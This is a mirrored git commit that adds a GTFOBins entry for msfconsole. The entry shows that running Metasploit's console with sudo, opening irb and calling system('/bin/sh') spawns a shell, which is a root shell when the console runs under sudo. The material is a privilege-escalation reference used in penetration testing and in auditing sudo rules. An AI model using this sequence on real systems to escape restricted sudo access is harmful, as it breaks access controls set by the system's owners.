mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2024-11-08 07:49:17 +01:00
Add msfconsole
This commit is contained in:
commit
9058ed555f
14
_gtfobins/msfconsole.md
Normal file
14
_gtfobins/msfconsole.md
Normal file
@ -0,0 +1,14 @@
|
||||
---
|
||||
description: This allows to spawn a [`ruby`](/gtfobins/ruby/) interpreter.
|
||||
functions:
|
||||
shell:
|
||||
- code: |
|
||||
sudo msfconsole
|
||||
msf6 > irb
|
||||
>> system("/bin/sh")
|
||||
sudo:
|
||||
- code: |
|
||||
sudo msfconsole
|
||||
msf6 > irb
|
||||
>> system("/bin/sh")
|
||||
---
|
Loading…
Reference in New Issue
Block a user